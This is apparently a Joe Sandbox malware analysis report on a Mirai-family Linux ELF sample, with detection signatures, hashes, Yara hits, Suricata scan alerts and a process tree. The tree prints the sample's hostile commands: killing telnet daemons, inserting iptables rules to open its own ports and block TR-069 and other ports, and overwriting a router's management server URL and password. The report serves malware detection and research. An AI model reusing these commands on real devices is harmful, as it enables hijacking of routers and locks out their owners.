Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
bin.sh.elf

Overview

General Information

Sample name:bin.sh.elf
Analysis ID:1564319
MD5:08b9c0cce72be9d0593fb14d67780bff
SHA1:bba44d9dc631607564fbdd7483361099f5bb55e7
SHA256:72b9f5286030ea745a84f0b10e7650e13ca9f77a8a6c1fb6f2e30c7acf04fa9f
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Terminates several processes with shell command 'killall'
Uses known network protocols on non-standard ports
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Reads system information from the proc file system
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Sleeps for long times indicative of sandbox evasion
Suricata IDS alerts with low severity for network traffic
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1564319
Start date and time:2024-11-28 07:27:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 9s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:bin.sh.elf
Detection:MAL
Classification:mal100.spre.troj.evad.linELF@0/486@73/0
  • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
  • Reached maximum number of 1000 Suricata alerts, please consult the 'Suricata Logs'
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: bin.sh.elf
Command:/tmp/bin.sh.elf
PID:6240
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:telnetd: no process found
utelnetd: no process found
scfgmgr: no process found
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
/bin/sh: 1: cfgtool: not found
/bin/sh: 1: cfgtool: not found
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
  • system is lnxubuntu20
  • dash New Fork (PID: 6219, Parent: 4331)
  • rm (PID: 6219, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.xtr71Z5d7V /tmp/tmp.6BCIrgckW3 /tmp/tmp.FznSbp6tJ4
  • dash New Fork (PID: 6220, Parent: 4331)
  • cat (PID: 6220, Parent: 4331, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.xtr71Z5d7V
  • dash New Fork (PID: 6221, Parent: 4331)
  • head (PID: 6221, Parent: 4331, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 6222, Parent: 4331)
  • tr (PID: 6222, Parent: 4331, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 6223, Parent: 4331)
  • cut (PID: 6223, Parent: 4331, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 6224, Parent: 4331)
  • cat (PID: 6224, Parent: 4331, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.xtr71Z5d7V
  • dash New Fork (PID: 6225, Parent: 4331)
  • head (PID: 6225, Parent: 4331, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 6226, Parent: 4331)
  • tr (PID: 6226, Parent: 4331, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 6227, Parent: 4331)
  • cut (PID: 6227, Parent: 4331, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 6228, Parent: 4331)
  • rm (PID: 6228, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.xtr71Z5d7V /tmp/tmp.6BCIrgckW3 /tmp/tmp.FznSbp6tJ4
  • bin.sh.elf (PID: 6240, Parent: 6150, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/bin.sh.elf
    • bin.sh.elf New Fork (PID: 6242, Parent: 6240)
      • bin.sh.elf New Fork (PID: 6244, Parent: 6242)
        • sh (PID: 6246, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
          • sh New Fork (PID: 6252, Parent: 6246)
          • killall (PID: 6252, Parent: 6246, MD5: cd2adedbee501869ac691b88af39cd8b) Arguments: killall -9 telnetd utelnetd scfgmgr
        • bin.sh.elf New Fork (PID: 6257, Parent: 6244)
          • sh (PID: 6273, Parent: 6257, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 57285 -j ACCEPT"
            • sh New Fork (PID: 6275, Parent: 6273)
            • iptables (PID: 6275, Parent: 6273, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 57285 -j ACCEPT
          • sh (PID: 6280, Parent: 6257, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 57285 -j ACCEPT"
            • sh New Fork (PID: 6282, Parent: 6280)
            • iptables (PID: 6282, Parent: 6280, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 57285 -j ACCEPT
          • sh (PID: 6283, Parent: 6257, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 57285 -j ACCEPT"
            • sh New Fork (PID: 6285, Parent: 6283)
            • iptables (PID: 6285, Parent: 6283, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 57285 -j ACCEPT
          • sh (PID: 6288, Parent: 6257, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 57285 -j ACCEPT"
            • sh New Fork (PID: 6290, Parent: 6288)
            • iptables (PID: 6290, Parent: 6288, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 57285 -j ACCEPT
          • sh (PID: 6291, Parent: 6257, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 57285 -j ACCEPT"
            • sh New Fork (PID: 6293, Parent: 6291)
            • iptables (PID: 6293, Parent: 6291, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 57285 -j ACCEPT
          • sh (PID: 6294, Parent: 6257, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 57285 -j ACCEPT"
            • sh New Fork (PID: 6296, Parent: 6294)
            • iptables (PID: 6296, Parent: 6294, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 57285 -j ACCEPT
          • sh (PID: 6297, Parent: 6257, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 57285 -j ACCEPT"
            • sh New Fork (PID: 6299, Parent: 6297)
            • iptables (PID: 6299, Parent: 6297, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 57285 -j ACCEPT
          • sh (PID: 6300, Parent: 6257, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 57285 -j ACCEPT"
            • sh New Fork (PID: 6302, Parent: 6300)
            • iptables (PID: 6302, Parent: 6300, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 57285 -j ACCEPT
        • sh (PID: 6326, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
          • sh New Fork (PID: 6328, Parent: 6326)
          • iptables (PID: 6328, Parent: 6326, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
        • sh (PID: 6329, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
          • sh New Fork (PID: 6331, Parent: 6329)
          • iptables (PID: 6331, Parent: 6329, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
        • sh (PID: 6332, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
          • sh New Fork (PID: 6334, Parent: 6332)
          • iptables (PID: 6334, Parent: 6332, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP
        • sh (PID: 6335, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
          • sh New Fork (PID: 6337, Parent: 6335)
          • iptables (PID: 6337, Parent: 6335, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
        • sh (PID: 6338, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
        • sh (PID: 6340, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
        • sh (PID: 6342, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
          • sh New Fork (PID: 6344, Parent: 6342)
          • iptables (PID: 6344, Parent: 6342, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
        • sh (PID: 6345, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
          • sh New Fork (PID: 6347, Parent: 6345)
          • iptables (PID: 6347, Parent: 6345, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
        • sh (PID: 6348, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
          • sh New Fork (PID: 6350, Parent: 6348)
          • iptables (PID: 6350, Parent: 6348, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
        • sh (PID: 6351, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
          • sh New Fork (PID: 6353, Parent: 6351)
          • iptables (PID: 6353, Parent: 6351, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
        • sh (PID: 6354, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
          • sh New Fork (PID: 6356, Parent: 6354)
          • iptables (PID: 6356, Parent: 6354, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
        • sh (PID: 6357, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
          • sh New Fork (PID: 6359, Parent: 6357)
          • iptables (PID: 6359, Parent: 6357, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
        • sh (PID: 6360, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
          • sh New Fork (PID: 6366, Parent: 6360)
          • iptables (PID: 6366, Parent: 6360, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP
        • sh (PID: 6367, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
          • sh New Fork (PID: 6369, Parent: 6367)
          • iptables (PID: 6369, Parent: 6367, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP
        • sh (PID: 6372, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
          • sh New Fork (PID: 6377, Parent: 6372)
          • iptables (PID: 6377, Parent: 6372, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
        • sh (PID: 6378, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
          • sh New Fork (PID: 6380, Parent: 6378)
          • iptables (PID: 6380, Parent: 6378, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
        • sh (PID: 6382, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
          • sh New Fork (PID: 6387, Parent: 6382)
          • iptables (PID: 6387, Parent: 6382, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP
        • sh (PID: 6388, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
          • sh New Fork (PID: 6393, Parent: 6388)
          • iptables (PID: 6393, Parent: 6388, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
        • sh (PID: 6399, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 60815 -j ACCEPT"
          • sh New Fork (PID: 6401, Parent: 6399)
          • iptables (PID: 6401, Parent: 6399, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p udp --destination-port 60815 -j ACCEPT
        • sh (PID: 6402, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 60815 -j ACCEPT"
          • sh New Fork (PID: 6404, Parent: 6402)
          • iptables (PID: 6404, Parent: 6402, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p udp --source-port 60815 -j ACCEPT
        • sh (PID: 6405, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 60815 -j ACCEPT"
          • sh New Fork (PID: 6407, Parent: 6405)
          • iptables (PID: 6407, Parent: 6405, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 60815 -j ACCEPT
        • sh (PID: 6408, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 60815 -j ACCEPT"
          • sh New Fork (PID: 6414, Parent: 6408)
          • iptables (PID: 6414, Parent: 6408, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 60815 -j ACCEPT
        • sh (PID: 6415, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 60815 -j ACCEPT"
          • sh New Fork (PID: 6420, Parent: 6415)
          • iptables (PID: 6420, Parent: 6415, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p udp --dport 60815 -j ACCEPT
        • sh (PID: 6421, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 60815 -j ACCEPT"
          • sh New Fork (PID: 6426, Parent: 6421)
          • iptables (PID: 6426, Parent: 6421, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p udp --sport 60815 -j ACCEPT
        • sh (PID: 6427, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 60815 -j ACCEPT"
          • sh New Fork (PID: 6432, Parent: 6427)
          • iptables (PID: 6432, Parent: 6427, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p udp --dport 60815 -j ACCEPT
        • sh (PID: 6433, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 60815 -j ACCEPT"
          • sh New Fork (PID: 6438, Parent: 6433)
          • iptables (PID: 6438, Parent: 6433, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 60815 -j ACCEPT
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
bin.sh.elfJoeSecurity_Mirai_4Yara detected MiraiJoe Security
    bin.sh.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      bin.sh.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        bin.sh.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          bin.sh.elfLinux_Trojan_Mirai_5c62e6b2unknownunknown
          • 0x3850e:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
          Click to see the 2 entries
          SourceRuleDescriptionAuthorStrings
          /usr/networksJoeSecurity_Mirai_4Yara detected MiraiJoe Security
            /usr/networksJoeSecurity_Mirai_9Yara detected MiraiJoe Security
              /usr/networksJoeSecurity_Mirai_6Yara detected MiraiJoe Security
                /usr/networksJoeSecurity_Mirai_8Yara detected MiraiJoe Security
                  /usr/networksLinux_Trojan_Mirai_5c62e6b2unknownunknown
                  • 0x3850e:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
                  Click to see the 2 entries
                  SourceRuleDescriptionAuthorStrings
                  6242.1.00007fb730060000.00007fb73006a000.rw-.sdmpJoeSecurity_Mirai_4Yara detected MiraiJoe Security
                    6242.1.00007fb730060000.00007fb73006a000.rw-.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
                      6240.1.00007fb730060000.00007fb73006a000.rw-.sdmpJoeSecurity_Mirai_4Yara detected MiraiJoe Security
                        6240.1.00007fb730060000.00007fb73006a000.rw-.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
                          6242.1.00007fb730017000.00007fb730058000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
                            Click to see the 15 entries
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-28T07:28:00.893883+010020292151Attempted Administrator Privilege Gain192.168.2.233660612.244.152.15480TCP
                            2024-11-28T07:28:09.506579+010020292151Attempted Administrator Privilege Gain192.168.2.234842213.35.2.1608080TCP
                            2024-11-28T07:28:09.511709+010020292151Attempted Administrator Privilege Gain192.168.2.235315854.104.73.1938080TCP
                            2024-11-28T07:28:09.516467+010020292151Attempted Administrator Privilege Gain192.168.2.2344670106.43.212.1378080TCP
                            2024-11-28T07:28:09.519383+010020292151Attempted Administrator Privilege Gain192.168.2.233849631.195.52.6180TCP
                            2024-11-28T07:28:09.519767+010020292151Attempted Administrator Privilege Gain192.168.2.234156492.194.65.278080TCP
                            2024-11-28T07:28:09.520487+010020292151Attempted Administrator Privilege Gain192.168.2.2338606105.13.161.14480TCP
                            2024-11-28T07:28:09.522015+010020292151Attempted Administrator Privilege Gain192.168.2.2340038201.195.59.21780TCP
                            2024-11-28T07:28:09.522780+010020292151Attempted Administrator Privilege Gain192.168.2.235573227.105.227.24980TCP
                            2024-11-28T07:28:09.525388+010020292151Attempted Administrator Privilege Gain192.168.2.233627679.128.124.15780TCP
                            2024-11-28T07:28:09.525767+010020292151Attempted Administrator Privilege Gain192.168.2.2350332116.81.240.78080TCP
                            2024-11-28T07:28:09.528036+010020292151Attempted Administrator Privilege Gain192.168.2.234741228.196.179.238080TCP
                            2024-11-28T07:28:09.532902+010020292151Attempted Administrator Privilege Gain192.168.2.236075445.112.243.188080TCP
                            2024-11-28T07:28:09.536696+010020292151Attempted Administrator Privilege Gain192.168.2.2346998203.226.247.23580TCP
                            2024-11-28T07:28:09.543576+010020292151Attempted Administrator Privilege Gain192.168.2.23450329.130.45.9680TCP
                            2024-11-28T07:28:09.544689+010020292151Attempted Administrator Privilege Gain192.168.2.2344554215.109.47.1608080TCP
                            2024-11-28T07:28:09.545821+010020292151Attempted Administrator Privilege Gain192.168.2.235174840.57.210.16880TCP
                            2024-11-28T07:28:09.548802+010020292151Attempted Administrator Privilege Gain192.168.2.23468987.22.161.3780TCP
                            2024-11-28T07:28:09.549170+010020292151Attempted Administrator Privilege Gain192.168.2.233739460.38.64.1618080TCP
                            2024-11-28T07:28:09.553910+010020292151Attempted Administrator Privilege Gain192.168.2.2354778171.79.99.18080TCP
                            2024-11-28T07:28:09.558835+010020292151Attempted Administrator Privilege Gain192.168.2.2344434155.189.226.12580TCP
                            2024-11-28T07:28:09.567443+010020292151Attempted Administrator Privilege Gain192.168.2.2349896126.106.74.1568080TCP
                            2024-11-28T07:28:09.572301+010020292151Attempted Administrator Privilege Gain192.168.2.233787646.35.54.918080TCP
                            2024-11-28T07:28:09.580475+010020292151Attempted Administrator Privilege Gain192.168.2.234938294.141.19.2228080TCP
                            2024-11-28T07:28:09.589279+010020292151Attempted Administrator Privilege Gain192.168.2.2334374212.60.199.1138080TCP
                            2024-11-28T07:28:09.589648+010020292151Attempted Administrator Privilege Gain192.168.2.2359874108.136.248.7980TCP
                            2024-11-28T07:28:09.591845+010020292151Attempted Administrator Privilege Gain192.168.2.233447289.109.61.1418080TCP
                            2024-11-28T07:28:09.592955+010020292151Attempted Administrator Privilege Gain192.168.2.233612214.204.207.2378080TCP
                            2024-11-28T07:28:09.597681+010020292151Attempted Administrator Privilege Gain192.168.2.233319225.76.24.638080TCP
                            2024-11-28T07:28:09.598043+010020292151Attempted Administrator Privilege Gain192.168.2.2355006163.122.132.1878080TCP
                            2024-11-28T07:28:09.599186+010020292151Attempted Administrator Privilege Gain192.168.2.2333618177.71.61.1618080TCP
                            2024-11-28T07:28:09.601332+010020292151Attempted Administrator Privilege Gain192.168.2.2340352221.124.199.7480TCP
                            2024-11-28T07:28:09.603560+010020292151Attempted Administrator Privilege Gain192.168.2.234436619.106.226.18880TCP
                            2024-11-28T07:28:09.605387+010020292151Attempted Administrator Privilege Gain192.168.2.2357050146.110.86.8580TCP
                            2024-11-28T07:28:09.608435+010020292151Attempted Administrator Privilege Gain192.168.2.2344542142.253.75.1580TCP
                            2024-11-28T07:28:09.613986+010020292151Attempted Administrator Privilege Gain192.168.2.2337650119.37.208.25380TCP
                            2024-11-28T07:28:09.614351+010020292151Attempted Administrator Privilege Gain192.168.2.2338900167.201.110.2088080TCP
                            2024-11-28T07:28:09.615448+010020292151Attempted Administrator Privilege Gain192.168.2.2349878136.58.228.448080TCP
                            2024-11-28T07:28:09.616177+010020292151Attempted Administrator Privilege Gain192.168.2.2358306102.6.12.1548080TCP
                            2024-11-28T07:28:12.384471+010020292151Attempted Administrator Privilege Gain192.168.2.234992678.37.28.10580TCP
                            2024-11-28T07:28:15.212093+010020292151Attempted Administrator Privilege Gain192.168.2.2353628210.236.235.5580TCP
                            2024-11-28T07:28:21.506352+010020292151Attempted Administrator Privilege Gain192.168.2.2341208149.132.110.24080TCP
                            2024-11-28T07:28:21.507852+010020292151Attempted Administrator Privilege Gain192.168.2.2354262205.135.69.22080TCP
                            2024-11-28T07:28:21.508250+010020292151Attempted Administrator Privilege Gain192.168.2.234944831.112.217.428080TCP
                            2024-11-28T07:28:21.509692+010020292151Attempted Administrator Privilege Gain192.168.2.2349594155.174.193.2368080TCP
                            2024-11-28T07:28:21.520340+010020292151Attempted Administrator Privilege Gain192.168.2.234048656.165.139.280TCP
                            2024-11-28T07:28:21.521089+010020292151Attempted Administrator Privilege Gain192.168.2.2336932210.146.43.15980TCP
                            2024-11-28T07:28:21.525866+010020292151Attempted Administrator Privilege Gain192.168.2.234429868.239.15.1618080TCP
                            2024-11-28T07:28:21.528098+010020292151Attempted Administrator Privilege Gain192.168.2.233991886.204.100.1858080TCP
                            2024-11-28T07:28:21.531430+010020292151Attempted Administrator Privilege Gain192.168.2.2351858154.99.164.588080TCP
                            2024-11-28T07:28:21.534717+010020292151Attempted Administrator Privilege Gain192.168.2.234986656.59.236.15280TCP
                            2024-11-28T07:28:21.540241+010020292151Attempted Administrator Privilege Gain192.168.2.235294441.90.240.2358080TCP
                            2024-11-28T07:28:21.541341+010020292151Attempted Administrator Privilege Gain192.168.2.2347578146.120.170.1838080TCP
                            2024-11-28T07:28:21.541714+010020292151Attempted Administrator Privilege Gain192.168.2.2356390146.211.235.1158080TCP
                            2024-11-28T07:28:21.542511+010020292151Attempted Administrator Privilege Gain192.168.2.233966618.64.144.2548080TCP
                            2024-11-28T07:28:21.546935+010020292151Attempted Administrator Privilege Gain192.168.2.235120028.15.254.2180TCP
                            2024-11-28T07:28:21.551179+010020292151Attempted Administrator Privilege Gain192.168.2.233573681.191.165.1908080TCP
                            2024-11-28T07:28:21.557819+010020292151Attempted Administrator Privilege Gain192.168.2.234612475.38.117.8780TCP
                            2024-11-28T07:28:21.560080+010020292151Attempted Administrator Privilege Gain192.168.2.2353684123.224.87.23380TCP
                            2024-11-28T07:28:21.560091+010020292151Attempted Administrator Privilege Gain192.168.2.235028847.171.207.6180TCP
                            2024-11-28T07:28:21.560446+010020292151Attempted Administrator Privilege Gain192.168.2.235951864.105.173.628080TCP
                            2024-11-28T07:28:21.561240+010020292151Attempted Administrator Privilege Gain192.168.2.235498474.232.116.9680TCP
                            2024-11-28T07:28:21.563864+010020292151Attempted Administrator Privilege Gain192.168.2.23512203.178.63.1338080TCP
                            2024-11-28T07:28:21.566416+010020292151Attempted Administrator Privilege Gain192.168.2.2352552122.78.77.2248080TCP
                            2024-11-28T07:28:21.572355+010020292151Attempted Administrator Privilege Gain192.168.2.2358972122.91.172.14680TCP
                            2024-11-28T07:28:21.579352+010020292151Attempted Administrator Privilege Gain192.168.2.2335962220.226.175.25380TCP
                            2024-11-28T07:28:21.580087+010020292151Attempted Administrator Privilege Gain192.168.2.235632623.120.155.20880TCP
